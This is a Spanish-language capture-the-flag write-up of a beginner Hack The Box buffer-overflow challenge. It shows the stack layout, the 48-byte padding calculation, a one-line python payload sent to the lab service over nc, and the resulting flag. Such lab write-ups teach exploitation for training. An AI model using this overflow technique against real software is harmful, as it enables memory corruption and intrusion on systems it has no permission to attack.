Getting Started
3 minutos de lectura
En este reto se nos pide explotar una vulnerabilidad de Buffer Overflow básica, a parte de darnos instrucciones y ejemplos:
$ nc 178.62.11.21 31609
Stack frame layout
| . | <- Higher addresses
| . |
|_____________|
| | <- 64 bytes
| Return addr |
|_____________|
| | <- 56 bytes
| RBP |
|_____________|
| | <- 48 bytes
| target |
|_____________|
| | <- 40 bytes
| alignment |
|_____________|
| | <- 32 bytes
| Buffer[31] |
|_____________|
| . |
| . |
|_____________|
| |
| Buffer[0] |
|_____________| <- Lower addresses
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x0000000000000000 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
After we insert 4 "A"s, (the hex representation of A is 0x41), the stack layout like this:
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x0000000041414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
After we insert 4 "B"s, (the hex representation of B is 0x42), the stack layout looks like this:
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x4242424241414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x0000000000000000
0x00007ffe1d81dbe0 | 0x0000000000000000
0x00007ffe1d81dbe8 | 0x0000000000000000
0x00007ffe1d81dbf0 | 0x6969696969696969 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x00000000deadbeef <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉
◉ ◉
◉ Fill the 32-byte buffer, overwrite the alginment address and the "target's" 0xdeadbeef value. ◉
◉ ◉
◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉
>>
Básicamente, nos muestran cómo se almacenan los datos de entrada en la pila (stack) y nos piden que modifiquemos los valores 0x6969696969696969 y 0x00000000deadbeef presentes en la pila mediante la vulnerabilidad de Buffer Overflow. Si contamos el número de bytes necesarios, vemos que son 48 (6 * 8). Entonces, tenemos que introducir exactamente 48 caracteres, por ejemplo, letras A:
$ python3 -c 'print("A" * 48)'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Addr] | [Value]
-------------------+-------------------
0x00007ffe1d81dbd0 | 0x4141414141414141 <- Start of buffer
0x00007ffe1d81dbd8 | 0x4141414141414141
0x00007ffe1d81dbe0 | 0x4141414141414141
0x00007ffe1d81dbe8 | 0x4141414141414141
0x00007ffe1d81dbf0 | 0x4141414141414141 <- Dummy value for alignment
0x00007ffe1d81dbf8 | 0x4141414141414141 <- Target to change
0x00007ffe1d81dc00 | 0x000055a7c5e33800 <- Saved rbp
0x00007ffe1d81dc08 | 0x00007f339c259c87 <- Saved return address
0x00007ffe1d81dc10 | 0x0000000000000001
0x00007ffe1d81dc18 | 0x00007ffe1d81dce8
HTB{b0f_tut0r14l5_4r3_g00d}
[-] You failed!